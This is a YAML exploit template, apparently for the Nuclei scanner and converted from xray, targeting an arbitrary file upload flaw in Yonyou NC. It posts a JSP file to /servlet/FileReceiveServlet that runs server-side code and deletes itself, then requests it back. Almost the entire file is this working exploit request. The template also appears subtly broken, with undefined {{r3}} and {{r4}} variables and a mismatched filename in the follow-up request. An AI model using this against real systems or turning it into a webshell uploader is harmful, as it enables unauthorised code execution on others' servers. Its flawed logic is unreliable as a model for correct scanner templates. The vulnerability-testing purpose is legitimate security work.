id: poc-yaml-yonyou-nc-arbitrary-file-upload

info:
  name: poc-yaml-yonyou-nc-arbitrary-file-upload
  author: pa55w0rd(www.pa55w0rd.online/)
  severity: critical
  tags: xray-converted,fileupload,ct-158899
  reference:
    - https://blog.csdn.net/weixin_44578334/article/details/110917053

http:
  - raw:
      - |
        POST /servlet/FileReceiveServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;

        {{r3}}{{rand_int(1000, 9999)}}{{r4}}<%out.print("{{rand_int(1000, 9999)}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /{{rand_int(1000, 9999)}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200